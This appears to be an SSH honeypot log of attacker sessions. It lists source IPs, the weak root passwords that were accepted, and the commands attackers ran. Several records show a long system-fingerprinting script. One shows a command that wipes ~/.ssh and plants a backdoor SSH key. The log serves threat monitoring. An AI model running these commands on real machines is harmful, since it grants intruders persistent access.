"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"RECONNAISSANCE",
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 1234
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "28bb84ab850d",
"src_ip": "91.92.40.7",
"start_time": "2026-07-03T00:06:43.966236Z",
"end_time": "2026-07-03T00:06:47.518096Z",
"duration": "3.6",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1234"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"RECONNAISSANCE",
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "e4be9d15f6c3",
"src_ip": "91.92.40.7",
"start_time": "2026-07-03T00:05:00.314469Z",
"end_time": "2026-07-03T00:05:04.003806Z",
"duration": "3.7",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"RECONNAISSANCE",
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "99874f37d763",
"src_ip": "91.92.40.7",
"start_time": "2026-07-03T00:00:22.127932Z",
"end_time": "2026-07-03T00:00:22.279256Z",
"duration": "0.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "66698c624d1d",
"src_ip": "139.198.113.29",
"start_time": "2026-07-02T23:57:42.791646Z",
"end_time": "2026-07-02T23:57:43.836610Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "a47ba9eb83df",
"src_ip": "139.198.113.29",
"start_time": "2026-07-02T23:57:40.546075Z",
"end_time": "2026-07-02T23:57:42.635286Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Az.123456
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "c98280993bdc",
"src_ip": "139.198.113.29",
"start_time": "2026-07-02T23:57:38.269230Z",
"end_time": "2026-07-02T23:57:43.843826Z",
"duration": "5.6",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Az.123456"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sugon
{
"id": "f78bf19d4b92",
"src_ip": "185.242.3.195",
"start_time": "2026-07-02T23:55:13.805481Z",
"end_time": "2026-07-02T23:55:15.594074Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "sugon",
"pass": "sugon"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "1a537bcd95f5",
"src_ip": "147.185.132.15",
"start_time": "2026-07-02T23:38:04.952994Z",
"end_time": "2026-07-02T23:38:05.053975Z",
"duration": "0.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / ------fuck------
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "8a135f0d310b",
"src_ip": "120.48.181.68",
"start_time": "2026-07-02T23:17:54.234263Z",
"end_time": "2026-07-02T23:18:01.368235Z",
"duration": "7.1",
"version": "SSH-2.0-Go",
"hassh": "98f63c4d9c87edbd97ed4747fa031019",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "\ufeff------fuck------"
},
"commands": [
"uname -s -m"
],
"detailed_commands": [
{
"cmd": "uname -s -m",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"RECONNAISSANCE",
"COMMANDS RUN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "e21a6393d11d",
"src_ip": "120.48.181.68",
"start_time": "2026-07-02T23:17:53.439263Z",
"end_time": "2026-07-02T23:17:54.067051Z",
"duration": "0.6",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "fb367fc42508",
"src_ip": "1.24.16.36",
"start_time": "2026-07-02T23:13:10.096810Z",
"end_time": "2026-07-02T23:13:25.097220Z",
"duration": "15.0",
"version": "SSH-2.0-Go",
"hassh": "2aec6b44b06bec95d73f66b5d30cb69a",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "c2ecdbba7089",
"src_ip": "58.212.237.83",
"start_time": "2026-07-02T23:13:09.684912Z",
"end_time": "2026-07-02T23:13:11.596501Z",
"duration": "1.9",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "b2aa12be7752",
"src_ip": "118.145.242.127",
"start_time": "2026-07-02T23:05:27.503072Z",
"end_time": "2026-07-02T23:07:27.607595Z",
"duration": "120.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "1aebcff566b2",
"src_ip": "14.103.74.80",
"start_time": "2026-07-02T23:00:57.026586Z",
"end_time": "2026-07-02T23:02:57.070666Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "dc8fbdcafd3b",
"src_ip": "14.103.41.249",
"start_time": "2026-07-02T23:00:18.089046Z",
"end_time": "2026-07-02T23:02:18.104850Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: support / support
{
"id": "ba40a93f3a2c",
"src_ip": "176.53.159.196",
"start_time": "2026-07-02T22:36:25.520162Z",
"end_time": "2026-07-02T22:36:26.679740Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "support",
"pass": "support"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123zxc
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "c1eabf8b41bd",
"src_ip": "185.242.3.195",
"start_time": "2026-07-02T22:23:23.268129Z",
"end_time": "2026-07-02T22:23:24.442470Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123zxc"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: support / support
{
"id": "d734fdb26585",
"src_ip": "176.53.159.196",
"start_time": "2026-07-02T22:16:11.261491Z",
"end_time": "2026-07-02T22:16:12.418827Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "support",
"pass": "support"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Qwest87
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "71d7ac1d627d",
"src_ip": "212.227.239.101",
"start_time": "2026-07-02T22:15:43.417826Z",
"end_time": "2026-07-02T22:15:44.119730Z",
"duration": "0.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Qwest87"
},
"commands": [
"uname -a"
],
"detailed_commands": [
{
"cmd": "uname -a",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"RECONNAISSANCE",
"COMMANDS RUN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "0dea3d5137eb",
"src_ip": "205.210.31.236",
"start_time": "2026-07-02T22:13:44.923707Z",
"end_time": "2026-07-02T22:13:47.823476Z",
"duration": "2.9",
"version": "SSH-2.0-ZGrab ZGrab SSH Survey",
"hassh": "dd9bcf093c355da7000132131cb36fd0",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
